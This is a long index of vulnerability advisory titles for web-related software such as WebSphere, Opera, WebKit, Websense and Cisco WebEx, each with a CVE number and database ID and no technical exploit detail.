Webpress CVE-2014-8751 Cross-Site Scripting Vulnerability [80015] Allomani Weblinks CVE-2014-8766 SQL-Injection Vulnerability [79999] Websphere Portal CVE-2014-8902 Cross-Site Scripting Vulnerability [79998] Web Access CVE-2014-9352 Cross-Site Scripting Vulnerability [79996] Easy File Sharing Web Server CVE-2014-9439 Cross-Site Scripting Vulnerability [79982] Maian Weblog CVE-2014-10007 Cross-Site Scripting Vulnerability [79945] webtrees CVE-2014-100006 Cross-Site Scripting Vulnerability [79878] IBM Security Access Manager for Web and Security Access Manager OS Command Injection Vulnerability [79807] IBM WebSphere Application Server CVE-2015-5004 Information Disclosure Vulnerability [79787] Ganeti RESTful Control Interface Information Disclosure and Denial of Service Vulnerabilities [79779] Opera Web Browser CVE-2011-0450 Remote Security Vulnerability [79771] Acunetix Web Vulnerability Scanner CVE-2015-4027 Local Privilege Escalation Vulnerability [79770] Eva-Web CVE-2006-2690 Remote Security Vulnerability [79708] AVG 'AVG Web TuneUp' Extension Security Bypass and Cross Site Scripting Vulnerabilities [79707] Apple Safari WebKit Plug-ins CVE-2015-5828 Security Bypass Vulnerability [79694] IBM Business Process Manager Advanced and WebSphere Process Server Security Bypass Vulnerability [79646] RSA SecurID Web Agent CVE-2015-6851 Local Authentication Bypass Vulnerability [79603] WebFrame CVE-2009-0514 File-Upload Vulnerability [79596] Snippetmaster Webpage Editor CVE-2009-0530 Remote Security Vulnerability [79540] Web File Explorer CVE-2009-1495 Information Disclosure Vulnerability [79537] Aspwebcalendar CVE-2009-1223 Information Disclosure Vulnerability [79533] Webcollab CVE-2009-1455 Cross-Site Request Forgery Vulnerability [79511] IBM WebSphere Portal CVE-2015-7447 Information Disclosure Vulnerability [79499] Opera Web Browser CVE-2009-1599 Security Bypass Vulnerability [79481] Profense Web Application Firewall CVE-2009-1745 Remote Security Vulnerability [79450] Websphere Application Server CVE-2009-2088 Security Bypass Vulnerability [79448] Airlock Web Application Firewall CVE-2009-2300 Denial-Of-Service Vulnerability [79443] Websphere Application Server CVE-2009-2746 Cross-Site Request Forgery Vulnerability [79439] Opera Web Browser CVE-2009-2577 Denial-Of-Service Vulnerability [79413] IBM WebSphere Commerce Suite CVE-2009-2956 Information Disclosure Vulnerability [79412] Opera Web Browser CVE-2009-3048 Remote Security Vulnerability [79411] Opera Web Browser CVE-2009-3049 Remote Security Vulnerability [79401] Opera Web Browser CVE-2009-3046 Remote Security Vulnerability [79400] Opera Web Browser CVE-2009-3044 Remote Security Vulnerability [79395] Opera Web Browser CVE-2009-3047 Remote Security Vulnerability [79390] Opera Web Browser CVE-2009-3045 Remote Security Vulnerability [79385] Webauth CVE-2009-2945 Remote Security Vulnerability [79360] Websphere Application Server CVE-2009-3106 Information Disclosure Vulnerability [79356] Opera Web Browser CVE-2009-3269 Denial-Of-Service Vulnerability [79336] Email and Web Security Appliance CVE-2009-3339 Remote Security Vulnerability [79333] NaviCOPA Web Server CVE-2009-3646 Remote Security Vulnerability [79305] Webkit CVE-2009-3933 Denial-Of-Service Vulnerability [79294] Opera Web Browser CVE-2009-3832 Remote Security Vulnerability [79283] WebRTC CVE-2015-7210 Use After Free Denial of Service Vulnerability [79267] Opera Web Browser CVE-2009-4072 Remote Security Vulnerability [79179] Webform CVE-2009-4533 Remote Security Vulnerability [79166] Netbiter Webscada Firmware CVE-2009-4463 Denial-Of-Service Vulnerability [79132] WebGUI CVE-2009-4877 Cross-Site Request Forgery Vulnerability [79119] Webmathematica CVE-2009-4812 Information Disclosure Vulnerability [79103] Web Wiz Newspad CVE-2009-5019 Information Disclosure Vulnerability [79092] Palm Pre Webos CVE-2009-5098 Denial-Of-Service Vulnerability [79085] Palm Pre Webos CVE-2009-5097 Remote Security Vulnerability [79081] Palm Pre Webos CVE-2009-5071 Remote Security Vulnerability [79067] Websense Email Security CVE-2009-5121 Security Bypass Vulnerability [79066] Websense Email Security CVE-2009-5122 Information Disclosure Vulnerability [79063] Websense Web Filter CVE-2009-5119 Information Disclosure Vulnerability [79055] Websense Email Security CVE-2009-5131 Security Bypass Vulnerability [79049] Websense V10000 CVE-2009-5128 Denial-Of-Service Vulnerability [79047] Websense V10000 CVE-2009-5129 Denial-Of-Service Vulnerability [79046] Websense Email Security CVE-2009-5130 Denial-Of-Service Vulnerability [79042] Websense Web Filter CVE-2009-5132 Denial-Of-Service Vulnerability [79034] Cisco Unified Email and Unified Web Interaction Manager Cross Site Scripting Vulnerability [79029] Websphere Portal CVE-2010-0715 Remote Security Vulnerability [79021] Java System Web Server CVE-2010-0360 Remote Security Vulnerability [79003] OmniWeb CVE-2010-1102 Security Bypass Vulnerability [78986] Com Weberpcustomer CVE-2010-1315 Directory Traversal Vulnerability [78981] Opera Web Browser CVE-2010-1310 Information Disclosure Vulnerability [78980] WEBi CVE-2010-1243 Remote Security Vulnerability [78977] Com Webtv CVE-2010-1470 Directory Traversal Vulnerability [78966] Opera Web Browser CVE-2010-1728 Denial-Of-Service Vulnerability [78961] Websphere Application Server CVE-2010-1651 Information Disclosure Vulnerability [78944] Websphere Application Server CVE-2010-1650 Information Disclosure Vulnerability [78927] Rock Web Server CVE-2010-2271 Remote Security Vulnerability [78925] Rock Web Server CVE-2010-2270 Remote Security Vulnerability [78916] Rock Web Server CVE-2010-2269 Directory Traversal Vulnerability [78906] Open Web Analytic CVE-2010-2677 Remote Security Vulnerability [78905] Opera Web Browser CVE-2010-2657 Remote Security Vulnerability [78893] H264webcam CVE-2010-2349 Denial-Of-Service Vulnerability [78890] Open Web Analytic CVE-2010-2676 Directory Traversal Vulnerability [78889] Opera Web Browser CVE-2010-2658 Remote Security Vulnerability [78888] Websphere Application Server CVE-2010-2323 Information Disclosure Vulnerability [78884] SasCam WebCam Server CVE-2010-2505 Denial-Of-Service Vulnerability [78866] Opera Web Browser CVE-2010-3021 Denial-Of-Service Vulnerability [78860] Opera Web Browser CVE-2010-3020 Remote Security Vulnerability [78857] Opera Web Browser CVE-2010-3019 Denial-Of-Service Vulnerability [78849] Weborf CVE-2010-3306 Directory Traversal Vulnerability [78826] Websphere Application Server CVE-2010-3186 Remote Security Vulnerability [78817] Cisco Emergency Responder Web Framework CVE-2015-6407 Arbitrary File Upload Vulnerability [78812] Cisco Emergency Responder Service Web Framewok Cross Site Request Forgery Vulnerability [78792] Websiteadmin CVE-2010-3688 File-Upload Vulnerability [78762] Opera Web Browser CVE-2010-4044 Denial-Of-Service Vulnerability [78760] Opera Web Browser CVE-2010-4043 Information Disclosure Vulnerability [78752] Opera Web Browser CVE-2010-4049 Denial-Of-Service Vulnerability [78745] Opera Web Browser CVE-2010-4048 Denial-Of-Service Vulnerability [78726] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [78722] WebKit CVE-2015-7050 Information Disclosure Vulnerability [78720] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [78655] Websense Web Security CVE-2010-5146 Local Security Vulnerability [78652] Websense Web Security CVE-2010-5144 Security Bypass Vulnerability [78651] Websense Web Security CVE-2010-5149 Denial-Of-Service Vulnerability [78649] Websense Web Security CVE-2010-5148 Remote Security Vulnerability [78637] Websense Web Security CVE-2010-5147 Denial-Of-Service Vulnerability [78629] Websense Web Security CVE-2010-5145 Denial-Of-Service Vulnerability [78613] IBM WebSphere Portal CVE-2015-5001 Denial of Service Vulnerability [78611] IBM WebSphere Portal CVE-2015-7413 Unspecified Cross Site Scripting Vulnerability [78610] IBM WebSphere Portal CVE-2015-4998 Unspecified Cross Site Scripting Vulnerability [78609] IBM WebSphere Portal CVE-2015-4993 Unspecified Cross Site Scripting Vulnerability [78600] WebSphere MQ CVE-2011-0310 Denial-Of-Service Vulnerability [78579] WEBi CVE-2011-1559 Remote Security Vulnerability [78445] Opera Web Browser CVE-2011-2628 Remote Security Vulnerability [78429] Opera Web Browser CVE-2011-2641 Denial-Of-Service Vulnerability [78418] Cisco WebEx Meetings for Android CVE-2015-6384 Remote Security Bypass Vulnerability [78383] Opera Web Browser CVE-2011-4681 Security Bypass Vulnerability [78375] Opera Web Browser CVE-2011-4682 Security Bypass Vulnerability [78371] Opera Web Browser CVE-2011-4683 Remote Security Vulnerability [78338] Websense Web Security CVE-2011-5102 Remote Security Vulnerability [78322] FreeWebshop CVE-2011-5147 Remote Security Vulnerability [78315] Cisco Web Security Appliance CVE-2015-6386 Denial of Service Vulnerability [78275] Opera Web Browser CVE-2012-1003 Denial-Of-Service Vulnerability [78247] WebGlimpse CVE-2012-1795 Remote Security Vulnerability [78245] Websphere Application Server CVE-2012-2162 Information Disclosure Vulnerability [78243] Opera Web Browser CVE-2012-1251 Information Disclosure Vulnerability [78172] Opera Web Browser CVE-2012-3563 Denial-Of-Service Vulnerability [78171] Opera Web Browser CVE-2012-3555 Remote Security Vulnerability [78168] Opera Web Browser CVE-2012-3558 Denial-Of-Service Vulnerability [78167] Opera Web Browser CVE-2012-3565 Denial-Of-Service Vulnerability [78166] Opera Web Browser CVE-2012-3561 Remote Security Vulnerability [78164] Opera Web Browser CVE-2012-3567 Denial-Of-Service Vulnerability [78163] Opera Web Browser CVE-2012-3559 Remote Security Vulnerability [78158] Opera Web Browser CVE-2012-3564 Denial-Of-Service Vulnerability [78155] Opera Web Browser CVE-2012-3557 Information Disclosure Vulnerability [78154] WebSphere MQ CVE-2012-3295 Security Bypass Vulnerability [78153] WebSphere Commerce CVE-2012-3298 Denial-Of-Service Vulnerability [78151] Opera Web Browser CVE-2012-3562 Denial-Of-Service Vulnerability [78150] Opera Web Browser CVE-2012-3568 Denial-Of-Service Vulnerability [78148] Opera Web Browser CVE-2012-3566 Denial-Of-Service Vulnerability [78147] Opera Web Browser CVE-2012-3560 Remote Security Vulnerability [78134] Websense Web Security CVE-2012-4604 Remote Security Vulnerability [78132] Zingiri Web Shop CVE-2012-4033 Remote Security Vulnerability [78038] Opera Web Browser CVE-2013-3210 Information Disclosure Vulnerability [78032] Payment For Webform CVE-2013-4594 Remote Security Vulnerability [78023] WebEx CVE-2013-3425 Remote Security Vulnerability [77972] Webid CVE-2014-5114 Remote Security Vulnerability [77950] Security Access Manager for Web CVE-2014-6087 Information Disclosure Vulnerability [77947] Security Access Manager for Web CVE-2014-6089 Denial-Of-Service Vulnerability [77944] Security Access Manager for Web CVE-2014-6088 Information Disclosure Vulnerability [77943] Websphere Portal CVE-2014-6193 Remote Security Vulnerability [77936] Websphere Datapower Xc10 Appliance Firmware CVE-2014-6143 Information Disclosure Vulnerability [77933] Security Access Manager for Web CVE-2014-6083 Remote Security Vulnerability [77931] Safenet Authentication Service Outlook Web Access CVE-2014-5359 Directory Traversal Vulnerability [77930] Security Access Manager for Web CVE-2014-6078 Remote Security Vulnerability [77927] Security Access Manager for Web CVE-2014-6084 Information Disclosure Vulnerability [77922] Security Access Manager for Web CVE-2014-6086 Information Disclosure Vulnerability [77920] Security Access Manager for Web CVE-2014-6082 Denial-Of-Service Vulnerability [77918] Websphere Datapower Xc10 Appliance Firmware CVE-2014-6138 Remote Security Vulnerability [77917] Security Access Manager for Web CVE-2014-6076 Remote Security Vulnerability [77910] Wallpaper Complete Website CVE-2006-6215 SQL-Injection Vulnerability [77898] Easy File Sharing Web Server CVE-2003-1296 Denial-Of-Service Vulnerability [77884] ONE Web Server CVE-2003-1126 Denial-Of-Service Vulnerability [77855] Helm Web Hosting Control Panel CVE-2006-5984 Cross-Site Scripting Vulnerability [77744] Web Access CVE-2014-9360 Remote Security Vulnerability [77735] IBM Integration Bus and WebSphere Message Broker CVE-2015-7399 Information Disclosure Vulnerability [77653] IBM WebSphere Application Server CVE-2015-7450 Remote Code Execution Vulnerability [77630] Exemys Telemetry Web Server CVE-2015-7910 Authentication Bypass Vulnerability [77587] pWebManager CVE-2015-7774 OS Command Injection Vulnerability [77563] IBM WebSphere Portal CVE-2015-7419 Unspecified Denial of Service Vulnerability [77539] Oracle WebLogic Server CVE-2015-4852 Remote Code Execution Vulnerability [77519] IBM WebSphere Commerce CVE-2015-5015 Information Disclosure Vulnerability [77438] Cisco Web Security Appliance CVE-2015-6293 Remote Denial of Service Vulnerability [77437] Cisco Web Security Appliance CVE-2015-6292 Denial of Service Vulnerability [77433] Cisco Web Security Appliance CVE-2015-6298 Multiple Command Injection Vulnerabilities [77392] Milton Webdav CVE-2015-7326 XML External Entity Multiple Information Disclosure Vulnerabilities [77318] IBM Security Access Manager for Web CVE-2015-4963 Information Disclosure Vulnerability [77316] IBM WebSphere Portal CVE-2014-8912 Information Disclosure Vulnerability [77314] IBM WebSphere Portal CVE-2015-4997 Security Bypass Vulnerability [77294] Drupal Webform CiviCRM Integration Module Cross Site Scripting Vulnerability [77269] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [77267] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [77264] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [77259] IniNet Solutions SCADA Web Server Multiple Security Vulnerabilities [77256] IniNet Solutions eWebServer CVE-2015-1005 Local Information Disclosure Vulnerability [77122] Juniper Junos J-Web CVE-2014-6451 Remote Denial of Service Vulnerability [77029] IBM Websphere Message Broker and Integration Bus CVE-2015-5011 Local Security Bypass Vulnerability [77024] Drupal 'web-fixtures\issue130.php' Cross Site Scripting Vulnerability [77009] Microsoft Office Web Apps Server CVE-2015-6037 Spoofing Vulnerability [76928] Trend Web Server CVE-2015-5653 Buffer Overflow Vulnerability [76890] EMC RSA Web Threat Detection CVE-2015-4548 Local Privilege Escalation Vulnerability [76887] EMC RSA Web Threat Detection CVE-2015-4547 Information Disclosure Vulnerability [76880] IcedTea-Web CVE-2015-5235 Origin Spoofing Vulnerability [76877] IcedTea-Web CVE-2015-5234 Security Bypass Vulnerability [76868] SAP HANA Web-based Development Workbench Cross Site Scripting Vulnerability [76864] InduSoft Web Studio CVE-2015-7374 Remote Code Execution Vulnerability [76808] Web Reference Database Multiple Security Vulnerabilities [76766] WebKit APPLE-SA-2015-09-16-1 Multiple Security Vulnerabilities [76753] Advantech WebAccess CVE-2014-9202 Local Stack Buffer Overflow Vulnerability [76749] Splunk Web Unspecified Cross Site Scripting Vulnerability [76731] Symantec Web Gateway CVE-2015-5693 Code Injection Vulnerability [76730] Symantec Web Gateway CVE-2015-6547 Command Injection Vulnerability [76729] Symantec Web Gateway CVE-2015-6548 Multiple SQL Injection Vulnerabilities [76728] Symantec Web Gateway CVE-2015-5691 Multiple Cross Site Scripting Vulnerabilities [76726] Symantec Web Gateway CVE-2015-5692 Arbitrary File Upload Vulnerability [76725] Symantec Web Gateway CVE-2015-5690 Unauthorized Access Security Bypass Vulnerability [76724] IBM WebSphere eXtreme Scale CVE-2015-2027 Security Bypass Vulnerability [76723] IBM WebSphere eXtreme Scale CVE-2015-2031 Unspecified Cross Site Scripting Vulnerability [76721] IBM WebSphere eXtreme Scale CVE-2015-2025 Information Disclosure Vulnerability [76720] IBM WebSphere eXtreme Scale CVE-2015-2030 Security Bypass Vulnerability [76719] IBM WebSphere eXtreme Scale CVE-2015-2026 Cross Site Request Forgery Vulnerability [76718] IBM WebSphere eXtreme Scale CVE-2015-2029 Session Hijacking Vulnerability [76716] IBM WebSphere eXtreme Scale CVE-2015-2028 HTTP Response Splitting Vulnerability [76687] Cisco Web Security Appliance CVE-2015-6290 Denial of Service Vulnerability [76681] WhatsApp Web 'vCard' Format Multiple Remote Code Execution Vulnerabilities [76677] Cisco Web Security Appliance CVE-2015-6287 Denial of Service Vulnerability [76672] Advantech WebAccess CVE-2014-9208 Multiple Stack Buffer Overflow Vulnerabilities [76661] Webroot SecureAnywhere Mobile Protection SSL Certificate Validation Security Bypass Vulnerability [76659] IBM WebSphere MQ CVE-2015-2013 Denial of Service Vulnerability [76655] IBM WebSphere Portal CVE-2015-1943 Unspecified Denial of Service Vulnerability [76617] Sunny WebBox CVE-2015-3964 Hardcoded Password Security Bypass Vulnerability [76610] OrientDB Studio Interface Multiple Security Vulnerabilities [76544] IBM WebSphere Commerce CVE-2015-4980 Information Disclosure Vulnerability [76463] IBM WebSphere Application Server CVE-2015-4938 Spoofing Vulnerability [76442] IBM Websphere Message Broker and Integration Bus CVE-2015-2018 Information Disclosure Vulnerability [76406] Cisco Unified Web and E-Mail Interaction Manager CVE-2015-6255 Cross Site Scripting Vulnerability [76348] Cisco Unified Web and E-Mail Interaction Manager CVE-2015-4298 Authorization Bypass Vulnerability [76341] WebKit Same Origin Policy Multiple Security Bypass Vulnerabilities [76339] Apple Safari WebKit Page Loading Information Disclosure Vulnerability [76338] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [76332] Prisma Web Products Cross Site Request Forgery and Security Bypass Vulnerabilities [76328] Cisco WebEx Node for MCS CVE-2015-4297 Open Redirection Vulnerability [76234] Microsoft Windows WebDAV CVE-2015-2476 Man in the Middle Information Disclosure Vulnerability [76147] RubyGems Sidekiq 'web.rb' Cross Site Request Forgery Vulnerability [76133] IBM WebSphere DataPower XC10 Appliance CVE-2015-1970 Local Information Disclosure Vulnerability [76108] Webservice-DIC yoyaku CVE-2015-2978 Unspecified Authentication Bypass Vulnerability [76103] Webservice-DIC yoyaku CVE-2015-2977 Arbitrary File Creation Vulnerability [76088] Git GitWeb CVE-2011-2186 HTML Injection Vulnerability [75996] Unified MeetingPlace Web Conferencing Unauthorized Password Change Security Bypass Vulnerability [75979] Cisco WebEx Meetings Server CVE-2015-4281 Cross Site Request Forgery Vulnerability [75960] Cisco WebEx Training Center CVE-2015-4245 HTML Injection Vulnerability [75957] Cisco WebEx Meeting Center CVE-2015-4247 Unspecified HTML Injection Vulnerability [75956] Cisco WebEx Meeting Center CVE-2015-4246 Unspecified Cross Site Scripting Vulnerability [75917] Cisco WebEx Meetings Server CVE-2015-4276 Remote Code Execution Vulnerability [75860] Oracle E-Business Suite and WebCenter Portal CVE-2015-1926 Remote Security Vulnerability [75859] Oracle GlassFish Server and WebLogic Server CVE-2015-2623 Remote Security Vulnerability [75848] Oracle GlassFish Server and WebLogic Server CVE-2015-4744 Remote Security Vulnerability [75842] Oracle Web Cache CVE-2015-2658 Remote Security Vulnerability [75717] Juniper Junos J-Web CVE-2014-6447 Multiple Cross Site Scripting Vulnerabilities [75709] Cisco WebEx Meeting Center CVE-2015-4249 Cross Site Scripting Vulnerability [75703] Cisco AsyncOS for Email Security and Web Security Appliances Denial of Service Vulnerability [75555] Roundcube Webmail Multiple Security Vulnerabilities [75540] IBM WebSphere MQ CVE-2015-1967 Remote Information Disclosure Vulnerability [75494] Apple Safari WebKit PDF CVE-2015-3660 Information Disclosure Vulnerability [75492] WebKit Multiple Security Vulnerabilities [75486] IBM WebSphere Application Server CVE-2015-1927 Remote Privilege Escalation Vulnerability [75480] IBM WebSphere Application Server CVE-2015-1936 Session Hijacking Vulnerability [75479] IBM WebSphere Portal CVE-2015-1917 Cross Site Scripting Vulnerability [75478] IBM WebSphere Portal CVE-2015-1944 Unspecified Cross Site Scripting Vulnerability [75475] IBM WebSphere Portal CVE-2015-1887 Information Disclosure Vulnerability [75443] IBM Websphere Message Broker and Integration CVE-2015-0118 Information Disclosure Vulnerability [75381] Cisco WebEx Meeting Center CVE-2015-4212 Unspecified Information Disclosure Vulnerability [75361] Cisco WebEx Meeting Center CVE-2015-4208 Information Disclosure Vulnerability [75360] IBM Business Process Manager and WebSphere Lombardi Edition Directory Traversal Vulnerability [75351] Cisco WebEx Meeting Center CVE-2015-4209 Authorization Bypass Vulnerability [75350] Cisco WebEx Meeting Center CVE-2015-4207 Information Disclosure Vulnerability [75348] Cisco WebEx Meeting Center CVE-2015-4210 Cross Site Scripting Vulnerability [75344] IBM WebSphere Commerce CVE-2015-0196 HTTP Response Splitting Vulnerability [75326] Cisco Web Security Appliance CVE-2015-4198 HTTP Header Injection Vulnerability [75299] OpenEMR 'interface/globals.php' Authentication Bypass Vulnerability [75296] Cisco WebEx Meeting Center CVE-2015-4194 User Enumeration Vulnerability [75237] Web Console CVE-2015-3224 Remote Code Execution Vulnerability [75193] IBM WebSphere MQIPT CVE-2015-0173 Remote Information Disclosure Vulnerability [75189] IBM Unified Extensible Firmware Interface CVE-2014-4768 Denial of Service Vulnerability [75160] Websense Content Gateway 'handle_debug_network' Stack Buffer Overflow Vulnerability [75050] Direct Web Remoting CVE-2014-5326 Unspecified Cross Site Scripting Vulnerability [75036] HP WebInspect CVE-2015-2125 Unspecified Unauthorized Access Vulnerability [74969] RSA Web Threat Detection CVE-2015-0541 Cross Site Request Forgery Vulnerability [74938] WebDrive Multiple Stack Buffer Overflow Vulnerabilities [74912] IBM Business Process Manager and WebSphere Lombardi Edition Cross Site Scripting Vulnerability [74881] MAGMI Plugin For Magento Server 'web/ajax_pluginconf.php' Directory Traversal Vulnerability [74865] Sophos Web Server Protection Security Bypass Vulnerability [74849] Cisco Unified Web and E-Mail Interaction Manager CVE-2015-0753 SQL Injection Vulnerability [74802] SAP HANA Web-based Development Workbench Unspecified SQL Injection Vulnerability [74793] WebPAC Pro 'url' Parameter Open Redirection Vulnerability [74783] Webgrind 'file' Parameter Cross Site Scripting Vulnerability [74763] Drupal Web Links Module Cross Site Scripting Vulnerability [74706] IBM WebSphere MQ CVE-2015-0189 Local Denial of Service Vulnerability [74705] IBM WebSphere Portal CVE-2015-1921 Unspecified Open Redirection Vulnerability [74701] IBM WebSphere Commerce CVE-2014-6211 Local Information Disclosure Vulnerability [74696] Cisco Web Security Appliance CVE-2015-0738 Cross Site Scripting Vulnerability [74679] Fortinet FortiWeb CVE-2014-8619 Multiple Cross Site Scripting Vulnerabilities [74670] Websense Content Gateway Security Bypass Vulnerability [74647] Cisco WebEx Meetings Server CVE-2015-0634 Cross Site Scripting Vulnerability [74629] Wireshark Websocket Dissector CVE-2015-3810 Denial of Service Vulnerability [74577] WebODF CVE-2014-9716 HTML Injection Vulnerability [74572] Cisco Unified Web and E-Mail Interaction Manager CVE-2015-4299 Security Bypass Vulnerability [74526] WebKit CVE-2015-1154 Unspecified Memory Corruption Vulnerability [74525] WebKit CVE-2015-1152 Unspecified Memory Corruption Vulnerability [74523] WebKit CVE-2015-1153 Unspecified Memory Corruption Vulnerability [74440] IBM WebSphere Commerce CVE-2014-6211 Local Information Disclosure Vulnerability [74439] IBM WebSphere Application Server CVE-2015-1920 Remote Code Execution Vulnerability [74384] Barracuda Web Filter SSL Certificate Multiple Security Bypass Vulnerabilities [74371] TinyWebGallery Multiple Cross Site Request Forgery and PHP Code Injection Vulnerabilities [74369] IBM WebSphere MQ CVE-2015-0176 Cross Site Scripting Vulnerability [74343] Drupal Webform Multiple File Upload Module Multiple Cross Site Request Forgery Vulnerabilities [74341] Drupal Ubercart Webform Checkout Pane Module Multiple Cross Site Scripting Vulnerabilities [74326] IBM WebSphere MQ CVE-2014-4771 Denial of Service Vulnerability [74324] IBM Websphere Message Broker and Integration Bus CVE-2014-6170 Information Disclosure Vulnerability [74223] IBM WebSphere Application Server CVE-2015-0175 Remote Privilege Escalation Vulnerability [74222] IBM WebSphere Application Server CVE-2015-1882 Remote Privilege Escalation Vulnerability [74219] IBM WebSphere Application Server CVE-2015-1885 Remote Privilege Escalation Vulnerability [74218] IBM WebSphere Portal and Web Content Manager CVE-2015-1908 Cross Site Scripting Vulnerability [74216] IBM WebSphere Portal CVE-2015-1886 Unspecified Denial of Service Vulnerability [74215] IBM WebSphere Application Server CVE-2015-0174 Information Disclosure Vulnerability [74207] LiteSpeed Web Server 'httpreq.cpp' Use After Free Denial of Service Vulnerability [74195] Fortinet Fortiweb Multiple Security Vulnerabilities [74124] Oracle WebCenter Portal CVE-2015-0450 Remote Security Vulnerability [74118] Oracle WebCenter Portal CVE-2015-0456 Remote Security Vulnerability [74114] Oracle WebLogic Server CVE-2015-0449 Remote Security Vulnerability [74106] Oracle WebLogic Server CVE-2015-0482 Remote Security Vulnerability [74058] Cisco Web Security Appliance CVE-2015-0693 Local Privilege Escalation Vulnerability [74044] Cisco Web Security Appliance CVE-2015-0692 Local Arbitrary Code Execution Vulnerability [74018] Cisco Web Security Appliance CVE-2015-0698 Cross Site Scripting Vulnerability [74017] Juniper Junos J-Web CVE-2015-3004 Clickjacking Vulnerability [73986] WebKit CVE-2015-1123 Unspecified Memory Corruption Vulnerability [73980] WebKit CVE-2015-1125 Clickjacking Vulnerability [73977] WebKit CVE-2015-1126 Cross-Origin Security Bypass Vulnerability [73973] WebKit Private Browsing CVE-2015-1127 Security Bypass Vulnerability [73972] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [73958] IBM WebSphere Portal CVE-2014-8909 Unspecified Cross Site Scripting Vulnerability [73939] Proverbs Web Calendar 'calendar.php' Multiple Cross Site Scripting Vulnerabilities [73916] IBM WebSphere DataPower XC10 Appliance CVE-2015-1893 Session Hijacking Vulnerability [73894] Web Patio CVE-2012-2636 Cross-Site Scripting Vulnerability [73887] Easywebrealestate CVE-2012-5290 SQL-Injection Vulnerability [73882] Groupware Webmail Edition CVE-2012-6640 Cross-Site Scripting Vulnerability [73856] Mywebsearch CVE-2012-4018 Cross-Site Scripting Vulnerability [73855] Webmail CVE-2012-4668 Cross-Site Scripting Vulnerability [73852] Websphere Application Server CVE-2013-0596 Cross-Site Scripting Vulnerability [73827] xweblog CVE-2010-4856 SQL-Injection Vulnerability [73796] WEBi CVE-2011-1558 Cross-Site Scripting Vulnerability [73793] WebSphere ILOG Rule Team Server CVE-2011-1371 Cross-Site Scripting Vulnerability [73787] Codemeter Webadmin CVE-2011-3689 Cross-Site Scripting Vulnerability [73746] Rock Web Server CVE-2010-2267 Cross-Site Scripting Vulnerability [73744] Web Template Software CVE-2010-2509 Cross-Site Scripting Vulnerability [73702] JSON Web Token Libraries Multiple Security Bypass Vulnerabilities [73680] Opera Web Browser CVE-2010-4047 Cross-Site Scripting Vulnerability [73636] Wiccle Web Builder CVE-2010-3208 Cross-Site Scripting Vulnerability [73623] Websphere Portal CVE-2011-2754 Cross-Site Scripting Vulnerability [73600] Advanced Webhost Billing System CVE-2011-0510 SQL-Injection Vulnerability [73582] Web Server Plugin CVE-2010-2914 Cross-Site Scripting Vulnerability [73577] Nkinfoweb CVE-2010-1599 SQL-Injection Vulnerability [73573] Opera Web Browser CVE-2012-3556 Cross-Site Scripting Vulnerability [73570] Opera Web Browser CVE-2010-4045 Cross-Site Scripting Vulnerability [73567] xweblog CVE-2010-4855 SQL-Injection Vulnerability [73560] Webnetwork CVE-2012-0912 SQL-Injection Vulnerability [73551] Web Patio CVE-2012-2637 Cross-Site Scripting Vulnerability [73549] Webforum CVE-2011-4172 Cross-Site Scripting Vulnerability [73524] WEBi CVE-2010-1242 Cross-Site Scripting Vulnerability [73522] Web Template Software CVE-2010-2510 SQL-Injection Vulnerability [73460] Mozilla Firefox 'webrtc::VPMContentAnalysis::Release()' Information Disclosure Vulnerability [73439] Websense TRITON V-Series CVE-2015-2772 Unspecified Arbitrary File Upload Vulnerability [73435] WebDepo 'wood' Parameter SQL Injection Vulnerability [73429] Multiple Websense Products CVE-2015-2768 Unspecified Cross Site Scripting Vulnerability [73428] Multiple Websense Products CVE-2015-2771 Plaintext Credentials Information Disclosure Vulnerability [73427] Websense TRITON AP-EMAIL CVE-2015-2765 Unspecified Clickjacking Vulnerability [73426] Websense TRITON AP-EMAIL CVE-2015-2766 Unspecified Security Vulnerability [73424] Websense TRITON AP-DATA CVE-2015-2764 Multiple HTML Injection Vulnerabilities [73420] McAfee Email Gateway Secure Web Mail Client Cross Site Scripting Vulnerability [73418] Websense TRITON AP-EMAIL CVE-2015-2767 Unspecified Security Vulnerability [73417] Websense TRITON V-Series CVE-2014-9712 Unspecified Arbitrary File Read Vulnerability [73415] Websense TRITON AP-EMAIL CVE-2015-2763 Unspecified Security Vulnerability [73414] Websense TRITON AP-WEB CVE-2015-2761 Multiple Cross Site Scripting Vulnerabilities [73412] Websense TRITON AP-WEB CVE-2015-2762 User Enumeration Weakness [73407] Appweb CVE-2014-9708 Null Pointer Deference Denial of Service Vulnerability [73406] Websense TRITON V-Series CVE-2015-2773 Unspecified Arbitrary File Read Vulnerability [73404] GoAhead WebServer 'src/http.c' Directory Traversal Vulnerability [73345] Multiple Websense Products 'Sender address' Field HTML Injection Vulnerability [73275] IBM Business Process Manager and WebSphere Lombardi Edition Cross Site Scripting Vulnerability [73244] Cisco WebEx Meetings Server CVE-2015-0668 Cross Site Scripting Vulnerability [73242] Multiple Websense Products Unspecified Cross Site Scripting Vulnerability [73241] Multiple Websense Products 'explorer_wse' Path Access Bypass Vulnerability [73240] Multiple Websense Products Multiple Unspecified Cross Site Scripting Vulnerabilities [73236] Multiple Websense Products Unspecified Information Disclosure Vulnerability [73233] Multiple Websense Products 'CommandLineServlet' Servlet Command Injection Vulnerability [73222] WebGate eDVR Manager CVE-2015-2095 ActiveX Control Remote Heap Buffer Overflow Vulnerability [73215] Drupal Webform Module Cross Site Scripting Vulnerability [73072] IBM WebSphere Portal CVE-2015-0177 Unspecified Cross Site Scripting Vulnerability [73069] IBM WebSphere Portal CVE-2015-0139 Unspecified Cross Site Scripting Vulnerability [73067] IBM WebSphere Portal CVE-2014-6214 Cross Site Request Forgery Vulnerability [73063] SuperWebMailer 'defaultnewsletter.php' Cross Site Scripting Vulnerability [73011] Webshop hun 'index.php' Directory Traversal Vulnerability [72997] Webshop hun 'index.php' Multiple SQL Injection Vulnerabilities [72996] Webshop hun 'index.php' Multiple Cross Site Scripting Vulnerabilities [72993] Drupal Webform Module Multiple Cross Site Scripting Vulnerabilities [72992] WeBid 'ajax.php' Arbitrary File Upload Vulnerability [72934] WordPress Google Captcha (reCAPTCHA) by BestWebSoft Plugin Authentication Bypass Vulnerability [72883] Microsoft Exchange Server Outlook Web Access CVE-2015-1628 Cross Site Scripting Vulnerability [72857] KENT WEB Clip Board CVE-2015-0888 Arbitrary File Deletion Vulnerability 